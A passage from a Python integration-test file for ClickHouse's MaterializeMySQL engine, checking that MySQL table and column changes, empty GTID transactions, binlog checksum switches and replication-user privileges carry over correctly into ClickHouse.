    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY key FORMAT TSV",
                "1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
                "2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
                "3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
                "4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def drop_table_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Check DROP TABLE / TRUNCATE TABLE replication, both before and after the mapping."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    # Table dropped before the mapping exists must not appear in ClickHouse.
    mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("DROP TABLE test_database.test_table_1;")
    mysql_node.query("CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("TRUNCATE TABLE test_database.test_table_2;")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV", "")
    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
    mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_2\n")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV",
                "1\n2\n3\n4\n5\n6\n")
    # DROP and TRUNCATE issued while the mapping is live must replicate too.
    mysql_node.query("DROP TABLE test_database.test_table_1;")
    mysql_node.query("TRUNCATE TABLE test_database.test_table_2;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_2\n")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV", "")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def create_table_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Check CREATE TABLE replication for tables made both before and after the mapping."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    # existed before the mapping was created
    mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    # it already has some data
    mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    # Check for pre-existing status
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY id FORMAT TSV",
                "1\n2\n3\n5\n6\n7\n")
    # Table created after the mapping must replicate via the binlog.
    mysql_node.query("CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV",
                "1\n2\n3\n4\n5\n6\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def rename_table_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Check RENAME TABLE replication, both before and after the mapping exists."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    # Rename performed before the mapping: only the new name should be visible.
    mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("RENAME TABLE test_database.test_table_1 TO test_database.test_table_2")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_2\n")
    # Rename performed while the mapping is live must replicate as well.
    mysql_node.query("RENAME TABLE test_database.test_table_2 TO test_database.test_table_1")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def alter_add_column_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Check ALTER TABLE ... ADD COLUMN replication (plain, FIRST, AFTER, DEFAULT).

    The DEFAULT expression differs per MySQL flavor: literal `0` on mysql1,
    expression `(id)` otherwise — the expected DESC output changes to match.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    # ADD COLUMN variants issued before the mapping exists.
    mysql_node.query("CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("ALTER TABLE test_database.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
    mysql_node.query("ALTER TABLE test_database.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
    mysql_node.query("ALTER TABLE test_database.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
    mysql_node.query("ALTER TABLE test_database.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
        "0" if service_name == "mysql1" else "(id)"))
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
                "add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Same ALTERs again, now on a table created while the mapping is live.
    mysql_node.query("CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_2\n")
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query(
        "ALTER TABLE test_database.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
    mysql_node.query(
        "ALTER TABLE test_database.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
            "0" if service_name == "mysql1" else "(id)"))
    default_expression = "DEFAULT\t0" if service_name == "mysql1" else "DEFAULT\tid"
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV",
                "1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def alter_drop_column_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Check ALTER TABLE ... DROP COLUMN replication, both before and after the mapping."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    # Column dropped before the mapping exists must not appear in ClickHouse.
    mysql_node.query(
        "CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
    mysql_node.query("ALTER TABLE test_database.test_table_1 DROP COLUMN drop_column")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
    check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Column dropped while the mapping is live must replicate as well.
    mysql_node.query(
        "CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_2\n")
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("ALTER TABLE test_database.test_table_2 DROP COLUMN drop_column")
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1), (2), (3), (4), (5)")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def alter_rename_column_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Check ALTER TABLE ... RENAME COLUMN replication, both before and after the mapping."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    # maybe should test rename primary key?
    mysql_node.query(
        "CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
    mysql_node.query("ALTER TABLE test_database.test_table_1 RENAME COLUMN rename_column TO new_column_name")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Rename issued while the mapping is live must replicate as well.
    mysql_node.query(
        "CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("ALTER TABLE test_database.test_table_2 RENAME COLUMN rename_column TO new_column_name")
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV",
                "1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def alter_modify_column_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify that MySQL ``MODIFY COLUMN`` is replicated into ClickHouse.

    Checks that dropping NOT NULL maps to ``Nullable(Int32)`` and that
    column repositioning via ``FIRST``/``AFTER`` is mirrored, both for a
    table modified before the mapping exists and for one modified after.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    # maybe should test rename primary key?
    mysql_node.query(
        "CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
    # Modify issued before the ClickHouse mapping exists.
    mysql_node.query("ALTER TABLE test_database.test_table_1 MODIFY COLUMN modify_column INT")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
    check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query(
        "CREATE TABLE test_database.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_2\n")
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Modify issued after the mapping exists, replicated via the binlog.
    mysql_node.query("ALTER TABLE test_database.test_table_2 MODIFY COLUMN modify_column INT")
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Reposition the column to the front, then back after `id`.
    mysql_node.query("ALTER TABLE test_database.test_table_2 MODIFY COLUMN modify_column INT FIRST")
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("ALTER TABLE test_database.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
    check_query(clickhouse_node, "DESC test_database.test_table_2 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # NULL must round-trip through the now-nullable column.
    mysql_node.query("INSERT INTO test_database.test_table_2 VALUES(1, 2), (3, NULL)")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialize_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify a combined ``ALTER ... DROP COLUMN, RENAME TO, RENAME TO``.

    MySQL allows chaining several clauses (including two renames) into a
    single ALTER statement; both the pre-mapping and post-mapping variants
    must end up reflected in ClickHouse.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    mysql_node.query(
        "CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
    # Chained ALTER before the mapping exists: final table name is _3.
    mysql_node.query(
        "ALTER TABLE test_database.test_table_1 DROP COLUMN drop_column, RENAME TO test_database.test_table_2, RENAME TO test_database.test_table_3")
    # create mapping
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_3\n")
    check_query(clickhouse_node, "DESC test_database.test_table_3 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query(
        "CREATE TABLE test_database.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\ntest_table_3\n")
    check_query(clickhouse_node, "DESC test_database.test_table_1 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Same chained ALTER after the mapping exists: final table name is _4.
    mysql_node.query(
        "ALTER TABLE test_database.test_table_1 DROP COLUMN drop_column, RENAME TO test_database.test_table_2, RENAME TO test_database.test_table_4")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_3\ntest_table_4\n")
    check_query(clickhouse_node, "DESC test_database.test_table_4 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO test_database.test_table_4 VALUES(1), (2), (3), (4), (5)")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
    """Verify the replication consumer tolerates empty GTID transactions.

    Two cases are exercised: a manually-pinned GTID whose transaction
    contains only BEGIN/COMMIT, and a BEGIN/COMMIT pair wrapped in SQL
    comments around a real insert.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database")

    # RESET MASTER so Executed_Gtid_Set below has a single, parseable range.
    mysql_node.query("RESET MASTER")
    mysql_node.query("CREATE TABLE test_database.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
    mysql_node.query("INSERT INTO test_database.t1(a) VALUES(1)")

    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))

    # Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
    mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
    mysql_cursor.execute("SHOW MASTER STATUS")
    # Executed_Gtid_Set looks like "<uuid>:<begin>-<end>"; pin gtid_next to
    # end+1 so the following empty BEGIN/COMMIT gets its own GTID.
    (uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
    (seq_begin, seq_end) = seqs.split("-")
    next_gtid = uuid + ":" + str(int(seq_end) + 1)
    mysql_node.query("SET gtid_next='" + next_gtid + "'")
    mysql_node.query("BEGIN")
    mysql_node.query("COMMIT")
    mysql_node.query("SET gtid_next='AUTOMATIC'")

    # Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
    mysql_node.query("/* start */ begin /* end */")
    mysql_node.query("INSERT INTO test_database.t1(a) VALUES(2)")
    mysql_node.query("/* start */ commit /* end */")

    check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "t1\n")
    check_query(clickhouse_node, "SELECT * FROM test_database.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def select_without_columns(clickhouse_node, mysql_node, service_name):
    """Verify count()/virtual-column queries against a MaterializeMySQL table.

    After an insert plus a delete, the table holds delete-marker rows
    (_sign = -1) alongside data rows; merges are stopped so the raw part
    layout is deterministic. The expected raw row counts depend on the
    `optimize_on_insert` setting (with it on, the insert itself collapses
    rows), hence the two `res` variants.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    mysql_node.query("DROP DATABASE IF EXISTS db")
    clickhouse_node.query("DROP DATABASE IF EXISTS db")
    mysql_node.query("CREATE DATABASE db")
    mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
    clickhouse_node.query(
        "CREATE DATABASE db ENGINE = MaterializeMySQL('{}:3306', 'db', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
    # Freeze the part layout so raw (_sign/_version) counts are stable.
    clickhouse_node.query("SYSTEM STOP MERGES db.t")
    clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
    mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
    mysql_node.query("DELETE FROM db.t WHERE a=2;")
    optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
    if optimize_on_insert == "0":
        res = ["3\n", "2\n", "2\n"]
    else:
        res = ["2\n", "2\n", "1\n"]
    # Selecting the virtual columns explicitly sees raw (uncollapsed) rows...
    check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
    assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
    assert clickhouse_node.query("SELECT count(_version) FROM db.t FORMAT TSV") == res[2]
    # ...while plain count() and every indirect access path see the final
    # (filtered) single surviving row.
    assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
    assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
    clickhouse_node.query("DROP VIEW v")
    clickhouse_node.query("DROP DATABASE db")
    mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
    """Toggle MySQL's ``binlog_checksum`` mid-replication (CRC32 -> NONE ->
    CRC32) and verify inserts keep flowing into ClickHouse.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    # Fix: drop leftovers first so reruns do not fail on CREATE; every
    # sibling test in this module starts with the same guard.
    mysql_node.query("DROP DATABASE IF EXISTS test_checksum")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_checksum")
    mysql_node.query("CREATE DATABASE test_checksum")
    mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
    clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializeMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
    mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
    check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")
    # Replication must survive a live switch of the binlog checksum format.
    mysql_node.query("SET GLOBAL binlog_checksum=NONE")
    mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
    check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")
    # ...and a switch back to the default CRC32.
    mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
    mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
    check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")
    clickhouse_node.query("DROP DATABASE test_checksum")
    mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify behaviour when the replication user lacks required privileges.

    Steps: a minimally-privileged user replicates fine; revoking
    REPLICATION SLAVE (then REPLICATION CLIENT/RELOAD) leaves the database
    creatable but empty; revoking SELECT makes ATTACH fail with a SYNC
    USER ACCESS error until the grant is restored.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
    mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
    mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
    mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
    # User with exactly the minimum privileges replication needs.
    mysql_node.create_min_priv_user("test", "123")
    mysql_node.result("SHOW GRANTS FOR 'test'@'%';")

    # With full minimum privileges replication works end to end.
    clickhouse_node.query(
        "CREATE DATABASE priv_err_db ENGINE = MaterializeMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
            service_name))
    check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
    mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
    check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
    clickhouse_node.query("DROP DATABASE priv_err_db;")

    # Without REPLICATION SLAVE the database appears but stays empty.
